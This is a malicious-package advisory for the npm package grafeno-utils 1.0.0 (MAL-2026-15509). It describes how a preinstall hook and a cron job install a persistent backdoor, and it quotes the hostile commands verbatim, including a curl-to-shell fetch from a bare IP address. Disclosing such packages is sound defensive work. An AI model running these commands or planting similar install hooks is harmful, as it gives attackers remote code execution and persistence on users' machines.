npm

grafeno-utils @1.0.0

Vulnerability report · Last retrieved from osv.dev August 29, 2026 at 7:35 AM UTC

Malicious

OSV ID

MAL-2026-15509

Ecosystem

npm

Summary

The package's package.json preinstall lifecycle hook uses child_process to run curl -s 216.126.236.46/x.sh | sh , fetching a shell script from a bare IP over plain HTTP and piping it to /bin/bash at npm install time. The same preinstall additionally appends a crontab entry */30 * * * * curl -s 216.126.236.46/x.sh|sh , re-fetching and re-executing that remote script every 30 minutes and providing persistent remote code execution on the installer's host beyond the initial install. The destination is a hardcoded bare IPv4 address with no TLS and no integrity check; the fetched content is unpinned and attacker-mutable. This satisfies both install-time remote code execution and a backdoor persistence mechanism against the installer.

Source: amazon-inspector (5beb233fe40ca775519f2262a691a45445a9bda31c970d12aca3c584be4d32ad)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.